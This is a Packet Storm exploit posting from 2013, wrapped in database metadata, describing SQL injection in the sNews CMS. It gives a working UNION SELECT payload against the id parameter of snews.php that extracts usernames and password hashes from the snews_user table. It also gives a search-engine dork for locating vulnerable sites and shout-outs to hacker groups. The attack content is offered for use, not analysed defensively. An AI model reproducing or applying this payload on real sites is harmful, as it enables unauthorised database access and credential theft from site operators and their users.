ID PACKETSTORM:119573
Type packetstorm
Reporter By onestree
Modified 2013-01-15T00:00:00
Description
`
____ ____ ____ _______/ |________ ____ ____
/ _ \ / \_/ __ \ / ___/\ __\_ __ \_/ __ \_/ __ \
( <_> ) | \ ___/ \___ \ | | | | \/\ ___/\ ___/
\____/|___| /\___ >____ > |_ | |__| \___ >\___ >
\/ \/ \/ \/ \/
# Exploit Title : CMS snews SQL Injection Vulnerability
# Author : By onestree
# Software Link : http://snewscms.com/
# tested : ubuntu 12.10 / win 7
# Dork : inurl:"tanyakan pada rumput yang bergoyang"
*************************************************************
SQL poc:
http://localhost/snews/snews.php?act=shownews&id=[SQL]
Example:
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
Thanks :
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder
spesial my hunny :*
`
{"hash": "280d426cab4da0bc9e03b6c290d8846032a4dbb8b883a24ca5e7c9fbc2ed7b08", "sourceHref": "https://packetstormsecurity.com/files/download/119573/cmssnews-sql.txt", "title": "Snews CMS SQL Injection", "id": "PACKETSTORM:119573", "published": "2013-01-15T00:00:00", "description": "", "modified": "2013-01-15T00:00:00", "sourceData": "` \n \n____ ____ ____ _______/ |________ ____ ____ \n/ _ \\ / \\_/ __ \\ / ___/\\ __\\_ __ \\_/ __ \\_/ __ \\ \n( <_> ) | \\ ___/ \\___ \\ | | | | \\/\\ ___/\\ ___/ \n\\____/|___| /\\___ >____ > |_ | |__| \\___ >\\___ > \n\\/ \\/ \\/ \\/ \\/ \n \n \n# Exploit Title : CMS snews SQL Injection Vulnerability \n# Author : By onestree \n# Software Link : http://snewscms.com/ \n# tested : ubuntu 12.10 / win 7 \n# Dork : inurl:\"tanyakan pada rumput yang bergoyang\" \n \n \n************************************************************* \n \nSQL poc: \n \nhttp://localhost/snews/snews.php?act=shownews&id=[SQL] \n \nExample: \n \nhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* \n \n \nThanks : \n \nExploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell \n \nindonesiancoder - moeslimh4x0r - go-coder \n \nspesial my hunny :* \n`\n", "reporter": "By onestree", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9dff942b56f4542ceed78dc8bfd9cc66"}, {"key": "modified", "hash": "4fe7dc76b88259d2e72ed2c00f85eeae"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4fe7dc76b88259d2e72ed2c00f85eeae"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "d1d49769a134b0c492751349b107673f"}, {"key": "sourceData", "hash": "74786401f71ef579b62bdbc65f8c8f80"}, {"key": "sourceHref", "hash": "61aba19537d747335e05bb7f0f0ceb95"}, {"key": "title", "hash": "36c91ed2ce27411879242c74d64f5652"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/119573/Snews-CMS-SQL-Injection.html", "lastseen": "2016-11-03T10:16:28", "viewCount": 0, "enchantments": {"vulnersScore": 9.0}}
{"result": {}}
